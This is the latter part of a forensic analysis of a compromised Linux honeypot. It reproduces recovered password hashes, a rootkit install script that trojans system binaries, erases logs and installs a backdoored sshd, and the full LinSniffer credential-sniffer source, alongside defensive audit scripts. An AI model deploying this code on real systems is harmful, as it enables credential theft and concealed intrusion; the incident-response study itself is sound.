And another 40 hours to make this write-up. But that is more because I didn't

know where to start from :) Next time it would be faster...

 

Cost: It would be close to 1000 dollars at least. Though I'm sure people would

charge much more for this kind of analysis.

 

 

Section 11: How did I do the forensic investigation

 

After mounting the drives as readonly, the first thing I did was have a look around the drive to see if I could see something with my bare eyes (no

tools). Next I tried using find to see if the timestamps can help me.

 

Of course that was a very inefficient route to take, and I should have used TCT from the very beginning.

 

Once I had TCT compiled I used mactime to do most of my work. I got a list of "accessed" files, and those which were "modified". Most of the work went

into analysing the various timestamps and reconstructing what happened when.

 

Once I had a fair idea of what was installed and what could have been modified, I started hunting for answers in the deleted files. Unfortunately mactime didn't give me info about stuff which has been deleted. I'm sure there are a million ways of doing this, but I used the "HEX FILE viewer" in "mc" for my job. I specifically looked for the /var/log/messages file and the passwd/shadow files.

 

I also found the rootkit install script as a bonus during the process. All of the above actually helped me confirm the timeline I created earlier.

 

The most difficult part of the challenge was writing up this documentation in a readable format for everybody to understand. I've listed below the various references I used to write this documentation. I wish to make a special mention that Max Vision's "Ramen Analysis" had a lot to do with the HTML formatting of this document. That is also one of the most interesting pieces of analysis I've read in a while.

Section 11: References

 

"Multiple Linux Vendor rpc.statd Remote Format String Vulnerability": http://www.securityfocus.com/bid/1480

"statdx.c" exploit by ron1n, posted to the Bugtraq mailing list

"Redhat Linux 6.x remote root exploit": http://www.kulua.org/Archives/kulua-l/200008/msg00159.html by "Christofer C. Bell" <cbell@jayhawks.net>

"Reference to addy.awk as part of a rootkit": http://www.cs.fiu.edu/campus/cndg/msg00007.html by David Dittrich

"mstream analysis": http://staff.washington.edu/dittrich/misc/mstream.analysis.txt by David Dittrich

"Multiple Linux Vendor rpc.statd Remote Format String Vulnerability" (exploit entry): http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dexploit%26vid%3D1480 by ron1n <shellcode@hotmail.com>

"Explanation of exploit": http://security-archive.merton.ox.ac.uk/bugtraq-200008/0091.html by ron1n <shellcode@HOTMAIL.COM>

"Exploit signature": http://www.whitehats.com/info/IDS442

"A very old statd exploit": http://p.ulh.as/xploitsdb/SunOS/statd.html

"How to do a forensic analysis": http://staff.washington.edu/dittrich/misc/forensics/ by David Dittrich

"What the statd exploit looks like (1)": http://www.sans.org/y2k/081600.htm

"What the statd exploit looks like (2)": http://www.sans.org/y2k/110900.htm

"CERT Advisory": http://www.cert.org/incident_notes/IN-2000-10.html

"Redhat Errata": http://www.redhat.com/support/errata/

"Links to more resources": http://security.royans.net/static/resource.shtml

"How pscan is used (an old version of pscan is discussed here)": http://www.khubla.com/bhack.html#SkipFileList

"Discussion on z0ne": http://project.honeynet.org/papers/motives/day4.txt

 

 

 

 

Section 12: Files included

 

 

APPENDIX A: RECOVERED SHADOW FILE

APPENDIX B: RECOVERED ROOTKIT INSTALL SCRIPT

APPENDIX C:  LINSNIFFER

APPENDIX D: FILES MODIFIED - lists only files which were modified

APPENDIX E: FILES ACCESSED TIMES – lists files accessed and modified

 

 

 

 

APPENDIX A: RECOVERED SHADOW FILE

 

/etc/passwd

bin:x:1:1:bin:/bin:

daemon:x:2:2:daemon:/sbin:

adm:x:3:4:adm:/var/adm:

lp:x:4:7:lp:/var/spool/lpd:

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:

news:x:9:13:news:/var/spool/news:

uucp:x:10:14:uucp:/var/spool/uucp:

operator:x:11:0:operator:/root:

games:x:12:100:games:/usr/games:

gopher:x:13:30:gopher:/usr/lib/gopher-data:

ftp:x:14:50:FTP User:/home/ftp:

nobody:x:99:99:Nobody:/:

xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false

named:x:25:25:Named:/var/named:/bin/false

postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash

drosen:x:500:500::/home/drosen:/bin/bash

own:x:0:0::/root:/bin/bash

adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash

 

/etc/shadow

6Z/:11266:0:99999:7:-1:-1:134540356

bin:*:11266:0:99999:7:::

daemon:*:11266:0:99999:7:::

adm:*:11266:0:99999:7:::

lp:*:11266:0:99999:7:::

sync:*:11266:0:99999:7:::

shutdown:*:11266:0:99999:7:::

halt:*:11266:0:99999:7:::

mail:*:11266:0:99999:7:::

news:*:11266:0:99999:7:::

uucp:*:11266:0:99999:7:::

operator:*:11266:0:99999:7:::

games:*:11266:0:99999:7:::

gopher:*:11266:0:99999:7:::

ftp:*:11266:0:99999:7:::

nobody:*:11266:0:99999:7:::

xfs:!!:11266:0:99999:7:::

named:!!:11266:0:99999:7:::

postgres:!!:11266:0:99999:7:::

drosen:$1$X2MTV07B$jKfJisg1QOjpfXouUcg0i0:11266:0:99999:7:-1:-1:134540380

own::10865:0:99999:7:-1:-1:134538460

adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
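The account anomalies in the recovered files above (a second UID-0 account whose shadow password field is empty, an account whose home directory is /tmp, entries whose last-change day predates the rest of the system, and a damaged first shadow line) can be checked mechanically when triaging other hosts. The script below is an added example written for this report, not a tool from the original analysis or from the rootkit; it embeds an excerpt of the two files above as its sample input, and its check names and thresholds are its own.

```python
"""Audit a recovered passwd/shadow pair for the account anomalies visible in Appendix A.

Added example for this report; not part of the original analysis or of anything the
intruder left behind. The two strings below are an excerpt of the recovered files;
the check names and thresholds are this example's own.
"""
import re
from collections import Counter

# Constructed sample: excerpt of the recovered /etc/passwd from Appendix A.
PASSWD = """\
bin:x:1:1:bin:/bin:
ftp:x:14:50:FTP User:/home/ftp:
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
drosen:x:500:500::/home/drosen:/bin/bash
own:x:0:0::/root:/bin/bash
adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash
"""

# Constructed sample: excerpt of the recovered /etc/shadow from Appendix A.
# The first line is the damaged root entry exactly as recovered (name and most of
# the hash are gone); a parser has to tolerate it rather than choke on it.
SHADOW = """\
6Z/:11266:0:99999:7:-1:-1:134540356
bin:*:11266:0:99999:7:::
ftp:*:11266:0:99999:7:::
postgres:!!:11266:0:99999:7:::
drosen:$1$X2MTV07B$jKfJisg1QOjpfXouUcg0i0:11266:0:99999:7:-1:-1:134540380
own::10865:0:99999:7:-1:-1:134538460
adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
"""

DES_HASH = re.compile(r"[./0-9A-Za-z]{13}")   # traditional crypt(3) output, 13 chars


def parse_passwd(text):
    """Map account name to its fields; passwd lines have exactly 7 colon-separated fields."""
    users = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7:
            continue
        users[f[0]] = {"uid": int(f[2]), "gid": int(f[3]), "home": f[5], "shell": f[6]}
    return users


def parse_shadow(text):
    """Map account name to hash and last-change day; shadow lines have 9 fields.
    Lines with any other field count are returned separately as damaged."""
    entries, damaged = {}, []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 9:
            damaged.append(line)
            continue
        entries[f[0]] = {"hash": f[1], "lastchg": int(f[2]) if f[2].isdigit() else None}
    return entries, damaged


def audit(passwd_text, shadow_text):
    """Return a list of (account, finding) pairs; an empty list means nothing odd."""
    users = parse_passwd(passwd_text)
    shadow, damaged = parse_shadow(shadow_text)
    findings = [("<damaged>", f"shadow line with {len(l.split(':'))} fields instead of 9: {l[:24]!r}")
                for l in damaged]
    # The last-change day most accounts share is the day the system was installed;
    # an entry dated earlier than that (own: 10865, adm1: 10884) was not set on this
    # system after installation, which suggests it was copied in from elsewhere.
    days = Counter(e["lastchg"] for e in shadow.values() if e["lastchg"] is not None)
    install_day = days.most_common(1)[0][0] if days else None
    uses_md5 = any(e["hash"].startswith("$1$") for e in shadow.values())
    for name, u in users.items():
        if u["uid"] == 0 and name != "root":
            findings.append((name, "extra UID-0 account"))
        if u["home"] == "/tmp" or u["home"].startswith("/tmp/"):
            findings.append((name, f"home directory {u['home']} is world-writable scratch space"))
        s = shadow.get(name)
        if s is None:
            findings.append((name, "no shadow entry"))
            continue
        if s["hash"] == "":
            findings.append((name, "empty password field: login needs no password"))
        elif uses_md5 and DES_HASH.fullmatch(s["hash"]):
            findings.append((name, "traditional DES hash on a system whose other hashes are MD5 ($1$)"))
        if install_day is not None and s["lastchg"] is not None and s["lastchg"] < install_day:
            findings.append((name, f"password last changed on day {s['lastchg']}, before install day {install_day}"))
    for name in shadow:
        if name not in users:
            findings.append((name, "shadow entry with no matching passwd entry"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(PASSWD, SHADOW):
        print(f"{account:10} {finding}")
```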

 

 

APPENDIX B: RECOVERED ROOTKIT INSTALL SCRIPT

[script recovered from the honeypot.hda5.dd image; the tar member header preceding it was not recovered]

echo "installing sshd"

gunzip ssh-1.2.27*

tar -xvf ssh-1.2.27*

cd ssh*

make install

rm -rf /etc/sshd_config

cat << hi >> /etc/sshd_config

# This is ssh server systemwide configuration file.

 

Port 22

ListenAddress 0.0.0.0

HostKey /etc/ssh_host_key

RandomSeed /etc/ssh_random_seed

ServerKeyBits 768

LoginGraceTime 600

KeyRegenerationInterval 3600

PermitRootLogin yes

IgnoreRhosts no

StrictModes yes

QuietMode yes

X11Forwarding yes

X11DisplayOffset 10

FascistLogging no

PrintMotd yes

KeepAlive yes

SyslogFacility DAEMON

RhostsAuthentication no

RhostsRSAAuthentication yes

RSAAuthentication yes

PasswordAuthentication yes

PermitEmptyPasswords yes

UseLogin no

# CheckMail no

# PidFile /u/zappa/.ssh/pid

# AllowHosts *.our.com friend.other.com

# DenyHosts lowsecurity.theirs.com *.evil.org evil.org

# Umask 022

# SilentDeny yes

hi

rm -rf /usr/sbin/sshd /usr/sbin/sshd1

cp /usr/local/sbin/sshd1 /usr/sbin/sshd

echo "/usr/local/sbin/sshd1" >> /etc/rc.d/rc.local

ps aux | grep sshd | awk '{print "kill -1 "$2""}' > restart-sshd

chmod +x restart-sshd

echo "done installing sshd"

echo "now restarting"

echo "dont forget to remove the sshd folders"

./restart-sshd

[tar member header: Ci/install-sshd, mode 0100755, owner xrt (uid 1010, octal 1762), group users, 1076 bytes]

echo "installing sshd"

gunzip ssh-1.2.27*

tar -xvf ssh-1.2.27*

cd ssh*

make install

rm -rf /etc/sshd_config

cat << hi >> /etc/sshd_config

 

# This is ssh server systemwide configuration file.

 

Port 22

ListenAddress 0.0.0.0

HostKey /etc/ssh_host_key

RandomSeed /etc/ssh_random_seed

ServerKeyBits 768

LoginGraceTime 600

KeyRegenerationInterval 3600

PermitRootLogin yes

IgnoreRhosts no

StrictModes yes

QuietMode yes

X11Forwarding yes

X11DisplayOffset 10

FascistLogging no

PrintMotd yes

KeepAlive yes

SyslogFacility DAEMON

RhostsAuthentication no

RhostsRSAAuthentication yes

RSAAuthentication yes

PasswordAuthentication yes

PermitEmptyPasswords yes

UseLogin no

# CheckMail no

# PidFile /u/zappa/.ssh/pid

# AllowHosts *.our.com friend.other.com

# DenyHosts lowsecurity.theirs.com *.evil.org evil.org

# Umask 022

# SilentDeny yes

hi

echo "/usr/local/sbin/sshd1" >> /etc/rc.d/rc.local

ps aux | grep sshd | awk '{print "kill -1 "$2""}' > restart-sshd

chmod +x restart-sshd

echo "done installing sshd"

echo "now restarting"

echo "dont forget to remove the sshd folders"

./restart-sshd
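The sshd_config that install-sshd writes above turns on PermitEmptyPasswords, PermitRootLogin and QuietMode, which together with the passwordless UID-0 account in Appendix A gives the intruder a remote root login that leaves no syslog record. As an added example for this report (not from the original analysis or from the rootkit), the script below parses such a config, reports the settings that matter on this host, and writes out a corrected copy; the POLICY table of keywords, bad values and replacements is this example's own choice.

```python
"""Check an ssh 1.2.x sshd_config for the settings the rootkit's install-sshd relies on,
and emit a corrected copy.

Added example for this report; not part of the original analysis or of the rootkit.
The configuration text is the one install-sshd writes with its here-document (comment
lines dropped); the POLICY table is this example's own.
"""

# Constructed sample: the sshd_config written by install-sshd, comment lines removed.
ROOTKIT_SSHD_CONFIG = """\
Port 22
ListenAddress 0.0.0.0
HostKey /etc/ssh_host_key
PermitRootLogin yes
IgnoreRhosts no
StrictModes yes
QuietMode yes
FascistLogging no
RhostsAuthentication no
RhostsRSAAuthentication yes
RSAAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords yes
UseLogin no
"""

# keyword -> (value that is a problem, value to set instead, why it matters on this host)
POLICY = {
    "PermitEmptyPasswords": ("yes", "no",
        "the recovered shadow file has an empty password field for the UID-0 account own"),
    "PermitRootLogin": ("yes", "no",
        "allows a UID-0 account to log in directly over the network"),
    "IgnoreRhosts": ("no", "yes",
        "honours ~/.rhosts files, which the intruder can write once in"),
    "RhostsRSAAuthentication": ("yes", "no",
        "host-based trust alone is enough to log in without a password"),
    "QuietMode": ("yes", "no",
        "suppresses the syslog records that would show these logins"),
}
_LOWER = {k.lower(): k for k in POLICY}   # sshd matches keywords case-insensitively


def parse_sshd_config(text):
    """Return [(keyword, value)] in file order; blank lines and # comments are skipped."""
    settings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        keyword, _, value = line.partition(" ")
        settings.append((keyword, value.strip()))
    return settings


def audit_sshd_config(text):
    """Return [(keyword, found_value, wanted_value, reason)] for every POLICY violation."""
    problems = []
    for keyword, value in parse_sshd_config(text):
        canonical = _LOWER.get(keyword.lower())
        if canonical and value.lower() == POLICY[canonical][0]:
            bad, good, reason = POLICY[canonical]
            problems.append((canonical, value, good, reason))
    return problems


def harden(text):
    """Return the config with every offending value replaced by its POLICY value.
    POLICY keywords absent from the file are appended, so the choice is explicit
    instead of being left to the daemon's compiled-in default."""
    out, seen = [], set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        keyword, _, value = line.partition(" ")
        canonical = _LOWER.get(keyword.lower()) if line else None
        if canonical:
            seen.add(canonical)
            if value.strip().lower() == POLICY[canonical][0]:
                out.append(f"{canonical} {POLICY[canonical][1]}")
                continue
        out.append(raw)
    for keyword, (bad, good, reason) in POLICY.items():
        if keyword not in seen:
            out.append(f"{keyword} {good}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for keyword, found, wanted, reason in audit_sshd_config(ROOTKIT_SSHD_CONFIG):
        print(f"{keyword} {found} -> {wanted}: {reason}")
    print(harden(ROOTKIT_SSHD_CONFIG))
```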

 

 

[tar member header: Ci/install-named, mode 0100755, owner xrt (uid 1010), group users, 80 bytes]

gunzip named.tgz;tar -xvf named.tar

cd bin

./install

cd ..

 

########################################################

rm -rf bin named.tar

[tar member header: Ci/install, mode 0100755, owner xrt (uid 1010), group users, 1496 bytes]

#!/bin/sh

rm -rf /root/.bash_history

ln -s /dev/null /root/.bash_history

rm -rf /.bash_history

ln -s /dev/null /.bash_history

rm -rf ~games/.bash_history

ln -s /dev/null ~games/.bash_history

rm -rf /tmp/.bash_history

ln -s /dev/null /tmp/.bash_history

rm -rf /usr/games/.bash_history

ln -s /dev/null /usr/games/.bash_history

mkdir backup

cp /bin/ps backup

cp /usr/bin/top backup

cp /usr/sbin/syslogd backup

cp /bin/ls backup

cp /bin/netstat backup

cp /sbin/ifconfig backup

cp /usr/sbin/tcpd backup

echo "Trojaning in progress"

./fix /bin/ps ps

./fix /usr/bin/top top

./fix /usr/sbin/syslogd syslogd

./fix /bin/ls ls

./fix /sbin/ifconfig ifconfig

./fix /bin/netstat netstat

./fix /usr/sbin/tcpd tcpd

./fix /usr/sbin/in.identd in.identd

 

killall -HUP syslogd

./addbd

./snif &

echo "Sniffer ENABLED"

echo "running clean and a.sh"

./clean

./a.sh

mv ptyp /dev

gunzip rpms.tgz;tar -xvf rpms.tar;cd rpms;rpm -Uvh --force *.rpm;cd ..;rm -rf rpms*

killall -1 lpd

rm -rf /var/log/wtmp

cd /var/log

touch wtmp

cd /usr/man/.Ci

rm -rf install addbd

killall -HUP inetd

cp bx /bin/

chmod 755 /bin/bx

rm /usr/sbin/in.ftpd

mv in.ftpd /usr/sbin/

chmod +x /usr/sbin/in.ftpd

echo "done with installing shit"

echo "i'll now run whereis sshd"

echo "if nothing shows up then run ./install-sshd"

echo "if it's in /usr/local/sbin/sshd then run ./install-sshd"

echo "if it's in /usr/sbin/sshd then run ./install-sshd1"

whereis sshd

echo "after successfully installing sshd, run ./do"

echo "rootkit installation complete."

[tar member header: Ci/snif, mode 0100755, owner xrt (uid 1010), group users, 7229 bytes, the size Appendix D lists for /usr/man/.Ci/snif; binary contents not reproduced]

APPENDIX C:  LINSNIFFER

 

/*
LinSniffer 0.03 [BETA]
Mike Edulla
medulla@infosoc.com
*/

/* Recovered sniffer source. The comments marked "note:" and the five extra
   #includes were added for the readers of this report and are not in the
   recovered file; the code itself is unchanged apart from giving
   print_header(), print_data() and main() their declared return values. */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <linux/if.h>
#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
/* note: not in the recovered file; prototypes for exit(), read()/close(),
   ioctl(), isprint() and time() used below. */
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <time.h>

int openintf(char *);
int read_tcp(int);
int filter(void);
int print_header(void);
int print_data(int, char *);
char *hostlookup(unsigned long int);
void clear_victim(void);
void cleanup(int);

/* note: one raw Ethernet frame as delivered by the SOCK_PACKET socket:
   14-byte Ethernet header, IP header, TCP header, then the payload. */
struct etherpacket
{
   struct ethhdr eth;
   struct iphdr  ip;
   struct tcphdr tcp;
   char buff[8192];
}ep;

/* note: the one TCP connection currently being recorded. The sniffer follows
   a single connection at a time and drops it on FIN or RST, after CAPTLEN
   bytes of payload, or after TIMEOUT seconds. */
struct
{
   unsigned long      saddr;
   unsigned long      daddr;
   unsigned short     sport;
   unsigned short     dport;
   int                bytes_read;
   char               active;
   time_t             start_time;
} victim;

struct iphdr  *ip;
struct tcphdr *tcp;
int s;
FILE *fp;

#define CAPTLEN 512        /* note: payload bytes kept per connection, enough for a login */
#define TIMEOUT 30         /* note: seconds before an idle connection is abandoned */
#define TCPLOG "tcp.log"   /* note: written in the working directory; Appendix D lists
                              /usr/man/.Ci/tcp.log and /usr/man/.Ci/sniff.pid */

/* note: open a raw packet socket for IP frames (0x800) on interface d and put
   the interface into promiscuous mode. The PROMISC flag a genuine ifconfig
   would then display is the usual reason such a rootkit replaces
   /sbin/ifconfig, as the install script above does. */
int openintf(char *d)
{
   int fd;
   struct ifreq ifr;
   int s;
   fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
   if(fd < 0)
   {
      perror("cant get SOCK_PACKET socket");
      exit(0);
   }
   strcpy(ifr.ifr_name, d);
   s=ioctl(fd, SIOCGIFFLAGS, &ifr);
   if(s < 0)
   {
      close(fd);
      perror("cant get flags");
      exit(0);
   }
   ifr.ifr_flags |= IFF_PROMISC;
   s=ioctl(fd, SIOCSIFFLAGS, &ifr);
   if(s < 0) perror("cant set promiscuous mode");
   return fd;
}

/* note: block until a frame passes filter(); return its payload length,
   i.e. the frame length minus 54 bytes of Ethernet, IP and TCP headers. */
int read_tcp(int s)
{
   int x;
   while(1)
   {
      x=read(s, (struct etherpacket *)&ep, sizeof(ep));
      if(x > 1)
      {
         if(filter()==0) continue;
         x=x-54;
         if(x < 1) continue;
         return x;
      }
   }
}

/* note: decide whether the frame in ep belongs to a connection worth logging.
   Only TCP to the cleartext login services listed below is considered, a new
   connection is adopted on its SYN, and afterwards only frames of that exact
   four-tuple pass. Returns 1 to log the payload, 0 to discard the frame. */
int filter(void)
{
   int p;
   p=0;
   if(ip->protocol != 6) return 0;
   if(victim.active != 0)
      if(victim.bytes_read > CAPTLEN)
      {
         fprintf(fp, "\n----- [CAPLEN Exceeded]\n");
         clear_victim();
         return 0;
      }
   if(victim.active != 0)
      if(time(NULL) > (victim.start_time + TIMEOUT))
      {
         fprintf(fp, "\n----- [Timed Out]\n");
         clear_victim();
         return 0;
      }
   if(ntohs(tcp->dest)==21)  p=1; /* ftp */
   if(ntohs(tcp->dest)==23)  p=1; /* telnet */
   if(ntohs(tcp->dest)==110) p=1; /* pop3 */
   if(ntohs(tcp->dest)==109) p=1; /* pop2 */
   if(ntohs(tcp->dest)==143) p=1; /* imap2 */
   if(ntohs(tcp->dest)==513) p=1; /* rlogin */
   if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
   if(victim.active == 0)
      if(p == 1)
         if(tcp->syn == 1)
         {
            victim.saddr=ip->saddr;
            victim.daddr=ip->daddr;
            victim.active=1;
            victim.sport=tcp->source;
            victim.dport=tcp->dest;
            victim.bytes_read=0;
            victim.start_time=time(NULL);
            print_header();
         }
   if(tcp->dest != victim.dport) return 0;
   if(tcp->source != victim.sport) return 0;
   if(ip->saddr != victim.saddr) return 0;
   if(ip->daddr != victim.daddr) return 0;
   if(tcp->rst == 1)
   {
      victim.active=0;
      alarm(0);
      fprintf(fp, "\n----- [RST]\n");
      clear_victim();
      return 0;
   }
   if(tcp->fin == 1)
   {
      victim.active=0;
      alarm(0);
      fprintf(fp, "\n----- [FIN]\n");
      clear_victim();
      return 0;
   }
   return 1;
}

/* note: one log record per adopted connection, "client => server [port]";
   this is the line to look for when reading a recovered tcp.log. */
int print_header(void)
{
   fprintf(fp, "\n");
   fprintf(fp, "%s => ", hostlookup(ip->saddr));
   fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest));
   return 0;
}

/* note: append the printable payload bytes to the log, starting a new line
   on carriage return (end of a typed line) or after 76 characters; this is
   how names and passwords typed into telnet, ftp or pop end up in tcp.log. */
int print_data(int datalen, char *data)
{
   int i=0;
   int t=0;

   victim.bytes_read=victim.bytes_read+datalen;
   for(i=0;i != datalen;i++)
   {
      if(data[i] == 13) { fprintf(fp, "\n"); t=0; }
      if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
      if(t > 75) {t=0;fprintf(fp, "\n");}
   }
   return 0;
}

/* note: run with any single argument to log to stdout, with none to append
   to tcp.log. SIGKILL cannot be caught, so that handler is never called. */
int main(int argc, char **argv)
{
   s=openintf("eth0");
   /* note: the 14-byte Ethernet header is padded to 16 inside the struct for
      alignment, so the real IP and TCP headers start 2 bytes before ep.ip and
      ep.tcp; the same -2 is applied to ep.buff in the loop below. */
   ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
   tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
   signal(SIGHUP, SIG_IGN);
   signal(SIGINT, cleanup);
   signal(SIGTERM, cleanup);
   signal(SIGKILL, cleanup);
   signal(SIGQUIT, cleanup);
   if(argc == 2) fp=stdout;
   else fp=fopen(TCPLOG, "at");
   if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);}
   clear_victim();
   for(;;)
   {
      read_tcp(s);
      /* note: payload length from the IP total length field (network byte order) */
      if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
      fflush(fp);
   }
}

/* note: reverse-lookup an address for the log header, falling back to the dotted quad. */
char *hostlookup(unsigned long int in)
{
   static char blah[1024];
   struct in_addr i;
   struct hostent *he;

   i.s_addr=in;
   he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
   if(he == NULL) strcpy(blah, inet_ntoa(i));
   else strcpy(blah, he->h_name);
   return blah;
}

void clear_victim(void)
{
   victim.saddr=0;
   victim.daddr=0;
   victim.sport=0;
   victim.dport=0;
   victim.active=0;
   victim.bytes_read=0;
   victim.start_time=0;
}

void cleanup(int sig)
{
   fprintf(fp, "Exiting...\n");
   close(s);
   fclose(fp);
   exit(0);
}

APPENDIX D: FILES MODIFIED

(mactime output. Columns: date, time, size, MAC flags [m = contents modified, a = accessed, c = inode changed, "." = that time unchanged], permissions, owner, group, path. A row with an empty date/time column carries the same timestamp as the row above it.)
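The listing that follows is mactime output, one row per file, with a blank date/time column meaning the same second as the row above. As an added example for this report, not part of the original analysis, the parser below reads that format, flags the rows that match the rootkit's footprint (files owned by the uid 1010 carried in from the intruder's tar, hidden directories, a regular file in /dev, history files pointing at /dev/null) and groups rows into bursts of activity; the ten sample rows are copied from the listing, and the heuristics and the 60-second burst window are this example's own.

```python
"""Parse the mactime listing in this appendix and pull out the rootkit's footprint.

Added example for this report; not part of the original analysis. The ten sample
rows are copied from the listing; the heuristics in flag_entry() and the burst
window are this example's own.
"""
import re
from datetime import datetime, timedelta

# Constructed sample: ten rows taken verbatim from the listing in this appendix.
MACTIME_SAMPLE = """\
Nov 08 00 06:26:15        0 m.c -rw-r--r-- root     root     /etc/hosts.deny
Nov 08 00 06:51:54      714 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/a.sh
                       7229 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/snif
Nov 08 00 06:51:55      698 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/clean
                     350996 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/syslogd
Nov 08 00 06:52:09        9 m.c lrwxrwxrwx root     root     /root/.bash_history -> /dev/null
                       4096 mac drwxr-xr-x root     root     /usr/man/.Ci/backup
                      60080 mac -r-xr-xr-x root     root     /usr/man/.Ci/backup/ps
Nov 08 00 06:52:15      171 ..c -rw-r--r-- 1010     users    /dev/ptyp
Nov 08 00 06:52:32    51740 ..c -rwxr--r-- root     root     /usr/sbin/lpd
"""

# The date/time group is optional: mactime leaves it blank when it equals the previous row's.
ROW = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d\d \d\d \d\d:\d\d:\d\d)?\s+(?P<size>\d+)\s+(?P<mac>[mac.]{3})"
    r"\s+(?P<perms>\S{10})\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+(?P<path>.+?)\s*$")


def parse_mactime(text):
    """Return one dict per row, carrying the last seen timestamp forward."""
    rows, last_ts = [], None
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        if m["ts"]:
            last_ts = datetime.strptime(m["ts"], "%b %d %y %H:%M:%S")
        path, _, target = m["path"].partition(" -> ")   # symlink rows carry their target
        rows.append({"ts": last_ts, "size": int(m["size"]), "mac": m["mac"],
                     "perms": m["perms"], "owner": m["owner"], "group": m["group"],
                     "path": path, "target": target or None})
    return rows


def flag_entry(row):
    """Return the reasons this row looks like part of the rootkit install (empty if none)."""
    reasons = []
    if row["owner"].isdigit():
        reasons.append(f"owner uid {row['owner']} has no passwd entry: tar run as root "
                       "kept the archive's numeric owner")
    if any(part.startswith(".") for part in row["path"].split("/")[1:]):
        reasons.append("hidden directory or file")
    if row["path"].startswith("/dev/") and row["perms"][0] == "-":
        reasons.append("regular file in /dev")
    if row["path"].endswith(".bash_history") and row["target"] == "/dev/null":
        reasons.append("shell history redirected to /dev/null")
    return reasons


def bursts(rows, gap=timedelta(seconds=60)):
    """Group timestamped rows into bursts: a row within `gap` of the previous row's
    timestamp joins the current burst. Returns [(first_ts, last_ts, row_count)]."""
    out = []
    for row in sorted((r for r in rows if r["ts"]), key=lambda r: r["ts"]):
        if out and row["ts"] - out[-1][1] <= gap:
            first, _, count = out[-1]
            out[-1] = (first, row["ts"], count + 1)
        else:
            out.append((row["ts"], row["ts"], 1))
    return out


if __name__ == "__main__":
    rows = parse_mactime(MACTIME_SAMPLE)
    for first, last, count in bursts(rows):
        print(f"{first:%b %d %H:%M:%S} .. {last:%H:%M:%S}: {count} rows")
    for row in rows:
        for reason in flag_entry(row):
            print(f"{row['ts']:%H:%M:%S} {row['path']}: {reason}")
```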

 

Nov 06 00 01:00:41     4096 mac -rw-r--r-- root     root     /var/run/ftp.pids-all

Nov 06 00 02:02:00     1024 m.c drwxr-xr-x root     root     /var/lib

                       1024 m.c drwxr-xr-x root     root     /var/spool/anacron

Nov 06 00 02:02:03     4096 m.c drwxr-xr-x root     root     /usr/X11R6/man

                       4096 m.c drwxr-xr-x root     root     /usr/lib/perl5/man

                       4096 m.c drwxr-xr-x root     root     /usr/local/man

                        464 mac -rw-r--r-- root     root     /var/lib/logrotate.status

                          9 m.c -rw------- root     root     /var/spool/anacron/cron.daily

                          0 mac -rw-r--r-- root     root     /usr/X11R6/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/lib/perl5/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/local/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/man/whatis

                       1024 m.c drwxrwxr-x root     uucp     /var/lock

                       1024 ..c drwxrwxrwx xfs      xfs      /tmp/.font-unix

                       1024 m.c drwxr-x--- root     slocate  /var/lib/slocate

                     238767 m.c -rw-r----- root     slocate  /var/lib/slocate/slocate.db

Nov 08 00 06:26:15        0 m.c -rw-r--r-- root     root     /etc/hosts.deny

Nov 08 00 06:51:54      714 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/a.sh

                       7229 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/snif

Nov 08 00 06:51:55      698 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/clean

                     147900 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/inetd

                      12495 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/killall

                      49800 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/pstree

                     133344 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/q

                     132785 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/qs

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd

                        114 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/a.sh

